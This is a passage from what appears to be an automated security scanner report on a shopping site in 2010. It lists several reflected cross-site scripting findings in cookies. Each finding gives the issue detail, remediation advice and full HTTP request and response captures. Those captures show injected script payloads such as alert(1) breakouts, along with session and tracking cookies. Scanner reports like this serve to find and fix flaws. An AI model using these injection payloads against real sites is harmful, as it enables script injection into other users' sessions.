GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f272a</script><script>alert(1)</script>d1528753cbe ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 59083 Date: Sun, 26 Dec 2010 13:49:10 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59083 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'f272a</script><script>alert(1)</script>d1528753cbe ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+license_plate_frames
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe28"-alert(1)-"4e9cbe178c4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59959 Date: Sun, 26 Dec 2010 13:48:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59959 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+license_plate_frames
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df2e</script><script>alert(1)</script>12b946216a2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2df2e</script><script>alert(1)</script>12b946216a2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59978 Date: Sun, 26 Dec 2010 13:48:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59978 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '2df2e</script><script>alert(1)</script>12b946216a2 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.48. http://www.cafepress.com/+magnets [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+magnets
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48b1e"-alert(1)-"48ef400b324 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+magnets HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 59192 Date: Sun, 26 Dec 2010 13:48:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59192 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.49. http://www.cafepress.com/+magnets [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+magnets
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a93</script><script>alert(1)</script>a21dc3c1ba6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+magnets HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1a93</script><script>alert(1)</script>a21dc3c1ba6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59206 Date: Sun, 26 Dec 2010 13:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59206 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'f1a93</script><script>alert(1)</script>a21dc3c1ba6 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.50. http://www.cafepress.com/+mousepads [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+mousepads
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2de4"-alert(1)-"8af102be85f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 